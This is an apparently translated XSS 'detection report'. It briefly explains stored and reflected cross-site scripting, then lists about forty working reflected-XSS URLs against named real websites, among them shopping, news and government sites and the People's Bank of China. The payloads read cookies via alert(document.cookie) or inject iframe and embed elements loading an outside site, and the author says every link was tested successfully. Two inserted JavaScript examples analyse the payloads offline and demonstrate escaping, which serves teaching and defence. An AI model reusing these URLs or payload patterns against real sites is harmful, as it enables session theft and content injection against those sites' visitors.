Typical XSS (cross-site scripting) attack security detection report

Source: Internet
Author: User

Note: all of the following links were tested successfully in a browser.

For a web page, XSS means inserting content into the page without authorization. That alone is the vulnerability.

In practice, though, the concern is less the missing authorization than the inserted content itself, which is usually harmful, and the harm falls mostly on the other visitors of the page: the code that was inserted runs in their browser, not on the server.

"Runs in the browser" implies an execution environment, so XSS always depends on where the injected code ends up. Working out that environment, the context the code is reflected into, is the most critical step in any XSS case.

XSS is generally divided into persistent (stored) and non-persistent (reflected). In both, opening a link causes the injected code (malicious parameters) to run automatically. In the persistent type the code is stored in a database on the server, for example in a site's user name, self-introduction, password or similar field; if that field is not filtered, XSS follows. When I visit your page and your user name is a piece of code, I execute that code and bear whatever damage it does.

In the non-persistent type the code is a parameter inside a link. When I click it, the browser opens the link, the server-side program receives the code as a parameter, includes it in its output, and returns the result to me. Execution is triggered by handing the code parameter to the program at request time, so it is real-time rather than stored.
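The reflected case above, as an added example that is not part of the original report: a hypothetical search page (the template, the escapeHtml helper and the activeTags check are all assumptions of this example, not code from any site listed below) echoes the search keyword into its <title>, into a <span> and into an input attribute, the three contexts the links in this report break out of. A simplified tokenizer check then shows which payloads produce an active element with and without escaping.

```javascript
// Added example, not from the original report: a minimal model of the reflected
// (non-persistent) case. A hypothetical search page echoes the query into its
// <title>, into a <span> and into an input's value attribute, which are the three
// contexts the report's payloads target. Runs under Node.js, offline.

// Decode a query-string value the way a browser does: '+' is a space, %XX is a byte.
function decodeQueryValue(v) {
  return decodeURIComponent(v.replace(/\+/g, ' '));
}

// Unsafe rendering: the keyword is concatenated into the markup untouched.
function renderSearchUnsafe(keyword) {
  return (
    '<html><head><title>Search: ' + keyword + '</title></head>' +
    '<body><span class="kw">' + keyword + '</span>' +
    '<input type="text" name="q" value="' + keyword + '"></body></html>'
  );
}

// Title-only variant: shows why many payloads in the report begin with </title>.
function renderTitleOnly(keyword) {
  return '<html><head><title>Search: ' + keyword + '</title></head><body></body></html>';
}

// The fix for these contexts: HTML-escape the five characters that matter in text
// and double-quoted attribute values before the keyword is concatenated. A value
// reflected into a <script> block or a URL attribute would need a different encoder.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

function renderSearchSafe(keyword) {
  return renderSearchUnsafe(escapeHtml(keyword));
}

// Names of the tags a browser would actually create (simplified: ignores comments
// and <script>/<style> raw text). Text inside <title> is RCDATA: the tokenizer
// treats everything up to the first </title> as text, so an injected <script> that
// stays inside the title is inert and the payload has to emit </title> first.
function activeTags(html) {
  const outsideTitle = html.replace(/<title>[\s\S]*?<\/title>/gi, '<title></title>');
  const names = [];
  const re = /<([a-z][a-z0-9]*)\b/gi;
  let m;
  while ((m = re.exec(outsideTitle)) !== null) names.push(m[1].toLowerCase());
  return names;
}

const ACTIVE_CONTENT = ['script', 'embed', 'iframe', 'object'];

// True if rendering the payload with this template yields an active-content element.
function isVulnerable(render, payload) {
  return activeTags(render(payload)).some((t) => ACTIVE_CONTENT.includes(t));
}

// Payloads copied from the report's links (constructed test input for this example).
const PAYLOADS = {
  script: decodeQueryValue('%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E'),
  titleBreakout: decodeQueryValue('%3C%2Ftitle%3E%3Cembed+src%3Dhttp%3A%2F%2Fwww.chinaxiaoe.com%3E'),
  attrBreakout: decodeQueryValue('%22%2F%3E%3Cembed%20src%3Dhttp%3A%2F%2Fwww.chinaxiaoe.com%3E'),
};

function summary() {
  return {
    unsafeScript: isVulnerable(renderSearchUnsafe, PAYLOADS.script),          // true
    unsafeAttr: isVulnerable(renderSearchUnsafe, PAYLOADS.attrBreakout),      // true
    titleOnlyScript: isVulnerable(renderTitleOnly, PAYLOADS.script),          // false: inert RCDATA
    titleOnlyBreakout: isVulnerable(renderTitleOnly, PAYLOADS.titleBreakout), // true
    safeScript: isVulnerable(renderSearchSafe, PAYLOADS.script),              // false
    safeBreakout: isVulnerable(renderSearchSafe, PAYLOADS.titleBreakout),     // false
  };
}

console.log(summary());
```

The titleOnly pair is the point worth remembering from this report: a search page that only echoes the query into its <title> is not exploitable with a bare <script> tag, which is why so many of the links below start with an encoded </title>. Escaping before concatenation neutralizes both shapes because the browser decodes &lt;/title&gt; back to harmless text inside the RCDATA title.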

 

First: mingwan B2B

http://search.b2b.cn/product?k=%3cscript%3ealert(%27RC%27)%3c%2fscript%3e


Second: Phoenix Net (ifeng)

http://my.ifeng.com/?c=friends&a=visit&ftype=6&friendName=%3C/title%3E%3Cscript%3Ealert('RC')%3C/script%3E


Third: China Electronic Network (21ic)

http://search.21ic.com/so.php?keyword=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E


Fourth: China Energy Network

http://www.power-cn.cn/sample/search.asp?txtitle=<script>alert(document.cookie)</script>


Fifth: 21CN

http://tags.21cn.com/tagsSearch?tags=%3Cscript%3Ealert()%3C/script%3E


Sixth: CNKI

http://mall.cnki.net/magazine/articlesearch.aspx?keys=%3Ciframe%20src='HTTP://www.chinaxiaoe.com'%3E%3C/iframe%3E


Seventh: Computer World (CCW)

http://www.ccw.com.cn/search/search_article.php?keyword=%3C%2Fspan%3E%3Ciframe+src%3Dhttp%3A%2F%2Fwww.chinaxiaoe.com%3E%3C%2Fiframe%3E


Eighth: Suning

http://www.suning.com/emall/Search?SearchKeywords=%3Cembed%20SRC=HTTP://WWW.CHINAXIAOE.COM%3E%3C/EMBED%3E


Ninth: ANBO education

http://www.miiceic.org.cn/plus/search.php?keyword=%3Ciframe+src%3Dhttp%3A%2F%2Fwww.chinaxiaoe.com%3E%3Ciframe%3E


Tenth: Paipai

http://sse1.paipai.com/s-kt11l4oxquvw6sgiqyujn3barq3jjsolru4karusi74j48goi311h338kt1zn5ocpyvg6--1-48-80---3-4-3----2-2--128-0-0-PTAG,20084.2.2.html


11th: Source Code Sky (codesky)

http://www.codesky.net/article/search?s=Random_Coder%3C%2Ftitle%3E%3Ciframe+src%3Dhttp%3A%2F%2Fwww.chinaxiaoe.com%3E%3C%2Fiframe%3E


12th: Mop

http://so.mop.com?q=%3C/title%3E%3Cembed%20src=http://www.chinaxiaoe.com%3E%3C/embed%3E


13th: Rayli Women

http://search.rayli.com.cn/searchII.html?lxkw=%3C/span%3E%3Cembed%20src=http://www.chinaxiaoe.com%3E%3C/embed%3E


14th: Nuomi

http://www.nuomi.com/search?k=%3C%2Ftitle%3E%3Cembed+src%3DHttp%3A%2F%2Fwww.chinaxiaoe.com%3E%3C%2Fembed%3E


15th: China Welfare Lottery (zhcw)

http://app.zhcw.com/wwwroot/zhcw/jsp/indexSearch.jsp?query=Random_Coder%3C%2Ftitle%3E%3Cembed+src%3DHttp%3A%2F%2Fwww.chinaxiaoe.com%3E&site=2&id=1


18th: Pacific Network (pconline)

http://ks.pconline.com.cn/index.jsp?q=%3C%2Ftitle%3E%3Cembed+src%3Dhttp%3A%2F%2Fwww.chinaxiaoe.com%3E


19th: Panguso

http://news.panguso.com/newssearch.htm?orderType=1&q=%3C%2Ftitle%3E%3Cembed+src%3Dhttp%3A%2F%2Fwww.chinaxiaoe.com%3E


20th: 7K7K games

http://so.7k7k.com/game/1%22%2F%3E%3Cembed%20src%3Dhttp%3A%5C%2F%2Fwww.chinaxiaoe.com%3E.htm


21st: mobile search

http://202.85.216.217/query?qt=%3C/title%3E%3Cembed%20src=http://www.chinaxiaoe.com%3E


22nd: 19lou

http://www.19lou.com/search/thread?keyword=%3C%2Ftitle%3E%3Cembed%20src%3Dhttp%3A%2F%2Fwww.chinaxiaoe.com%3E


23rd: China Daily

http://search.chinadaily.com.cn/all_en.jsp?searchText=%22%3E%3Cembed+src%3Dhttp%3A%2F%2Fwww.chinaxiaoe.com%3E


24th: VeryCD

http://www.verycd.com/search/entries/%3C%2Ftitle%3E%3Cembed%20src%3Dhttp%3A%2F%2Fwww.chinaxiaoe.com%3E


25th: Tianya community

http://search.tianya.cn?q=%3C%2Ftitle%3E%3Cembed%20src%3Dhttp%3A%2F%2Fwww.chinaxiaoe.com%3E


26th: Huajun Software Park (newhua)

http://search.newhua.com/search_list.php?searchname=%3C%2Ftitle%3E%3Cembed%2F*%2Fsrc%3Dhttp%3A%2F%2Fwww.chinaxiaoe.com%3E


28th: Beidou Mobile Network (139shop)

http://mobile.139shop.com/brand/0/0_0_0-0-0-0-0-0_%3C/title%3E%3Cembed%20src=http://www.chinaxiaoe.com%3e_00%1.htm


29th: AppChina

http://www.appchina.com/market/berry/search.action?q=%3Cembed+src%3Dhttp%3A%2F%2Fwww.chinaxiaoe.com%3E


30th: Younet

http://user.younet.com/search/default.php?search_phone=\%22/%3E%3Cembed%20src=http://www.chinaxiaoe.com%3E


31st: Mbaobao

http://search.mbaobao.com/searcher?k=%3C%2Ftitle%3E%3Cembed+src%3Dhttp%3A%2F%2Fwww.chinaxiaoe.com%3E


32nd: COFCO Womai

http://www.womai.com/ProductList.htm?keywords=%3C%2Ftitle%3E%3Cembed%2F*%2Fsrc%3Dhttp%3A%2F%2Fwww.chinaxiaoe.com%3E


33rd: Yangguang shopping (cnrmall)

http://www.cnrmall.com/TV/product/search.jsp?key=%22/%3E%3Cembed%20src=http://www.chinaxiaoe.com%3E


34th: Manzuo

http://s.manzuo.com/search?keyword=%22%2F%3E%3Cembed%20src%3Dhttp%3A%2F%2Fwww.chinaxiaoe.com%3E


35th: youtao ordering Network (utao365)

http://www.utao365.com/search.php?encode=YTo1OntzOjg6ImNhdGVnb3J5IjtzOjE6IjAiO3M6ODoia2V5d29yZHMiO3M6MzU6IjwvdGl0bGU%2bPGVtYmVkIHNyYz1odHRwOi8vdG14ay5vcmc%
signature=
=


36th: China Meteorological Administration

http://www.cma.gov.cn:8080/was40/search?searchword=%3Cembed//src=http://www.chinaxiaoe.com%3E


37th: Ministry of Transport

http://search.moc.gov.cn:8080/was40/search?searchword=%3Cembed//src=http://www.chinaxiaoe.com%3E


38th: Ministry of Culture

http://app.mcprc.gov.cn:9000/was40/search?channelid=56599&searchword=%3Ciframe%20src=http://www.chinaxiaoe.com%3E%3C/iframe%3E


39th: People's Bank of China

http://www.pbc.gov.cn:8080/dig/Default.jsp?q=%22/%3E%3Ciframe%20src=http://www.chinaxiaoe.com%3E/iframe%3E


40th: China Telecom

http://search.chinatelecom.com.cn/was40/search?searchword=%3Ciframe//src=http://www.chinaxiaoe.com%3E%3C/iframe%3E


41st: Communist Youth League of China

http://www.gqt.org.cn/was40/search?channelid=17472&searchword=%3Ciframe//src=http://www.chinaxiaoe.com%3E%3C/iframe%3E


42nd: Central Compilation and Translation Bureau (cctb)

http://search.cctb.net:8081/utf8/search.jsp?channelid=76134&searchword=%3Ciframe//src=http://www.chinaxiaoe.com%3E%3C/iframe%3E
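To see what the links above actually send, here is an added example (not part of the original report) that decodes each URL's query parameters and path the way a browser would and reports which context the payload closes before injecting its element. The link sample is copied from the report's own entries and is never fetched; the classification rules and the names reflectedValues, classifyPayload and analyseAll are assumptions chosen for this example.

```javascript
// Added example, not from the original report: decode the test links listed above
// and name the reflection context each payload breaks out of. Runs under Node.js
// with no network access; the URLs below are copied from the report (constructed
// test input for this example, never requested).

const REPORT_LINKS = [
  'http://search.21ic.com/so.php?keyword=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E',
  'http://www.nuomi.com/search?k=%3C%2Ftitle%3E%3Cembed+src%3DHttp%3A%2F%2Fwww.chinaxiaoe.com%3E%3C%2Fembed%3E',
  'http://s.manzuo.com/search?keyword=%22%2F%3E%3Cembed%20src%3Dhttp%3A%2F%2Fwww.chinaxiaoe.com%3E',
  'http://search.rayli.com.cn/searchII.html?lxkw=%3C/span%3E%3Cembed%20src=http://www.chinaxiaoe.com%3E%3C/embed%3E',
  'http://www.cma.gov.cn:8080/was40/search?searchword=%3Cembed//src=http://www.chinaxiaoe.com%3E',
  'http://so.7k7k.com/game/1%22%2F%3E%3Cembed%20src%3Dhttp%3A%5C%2F%2Fwww.chinaxiaoe.com%3E.htm',
  'http://sse1.paipai.com/s-kt11l4oxquvw6sgiqyujn3barq3jjsolru4karusi74j48goi311h338kt1zn5ocpyvg6--1-48-80---3-4-3----2-2--128-0-0-PTAG,20084.2.2.html',
];

// Decode a path segment; leave it untouched if the encoding is malformed
// (the 139shop link above ends in a literal "%1", which is not a valid escape).
function safeDecode(s) {
  try {
    return decodeURIComponent(s);
  } catch (e) {
    return s;
  }
}

// Every place a server might reflect: each query parameter (URLSearchParams decodes
// '+' and %XX like a browser) plus the decoded path, for links that carry the
// payload in the path instead of the query string (7k7k, verycd, 139shop).
function reflectedValues(link) {
  const u = new URL(link);
  const values = [];
  for (const [name, value] of u.searchParams) values.push({ where: name, value });
  values.push({ where: '(path)', value: safeDecode(u.pathname) });
  return values;
}

// Find the first start tag in the value: a tag name followed by whitespace, '/' or
// '>'. The '/' case covers the <embed//src=...> and <embed/*/src=...> forms the report
// uses on the was40 and newhua search pages. What precedes that tag tells us which
// context the payload had to close first.
function classifyPayload(value) {
  const tag = /<([a-z][a-z0-9]*)(?=[\s\/>])/i.exec(value);
  if (!tag) return null;
  const before = value.slice(0, tag.index);
  let breakout = 'direct';
  if (/<\/title>$/i.test(before)) breakout = 'title';          // leaves <title> RCDATA
  else if (/\\?"\/?>$/.test(before)) breakout = 'attribute';  // closes value="..." and its tag
  else if (/<\/span>$/i.test(before)) breakout = 'span';
  return { breakout, element: tag[1].toLowerCase() };
}

function analyseLink(link) {
  for (const { where, value } of reflectedValues(link)) {
    const c = classifyPayload(value);
    if (c) return { link, where, breakout: c.breakout, element: c.element };
  }
  return { link, where: null, breakout: null, element: null };
}

function analyseAll(links) {
  return (links || REPORT_LINKS).map(analyseLink);
}

for (const r of analyseAll()) console.log(r.where, r.breakout, r.element, r.link);
```

Reading the output column by column is a quick triage of the whole report: payloads opening with </title> target search pages that echo the query into the page title, where a bare <script> would stay inert as RCDATA; payloads opening with "/> were reflected into an attribute value; and the <embed//src=...> form used against the was40 government search pages replaces the space between tag name and attribute with a slash, which the HTML tokenizer accepts (a '/' in a tag name ends the name and the parser moves on to attributes). The Paipai entry carries no markup in either its query or its path, so the script reports nothing for it.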
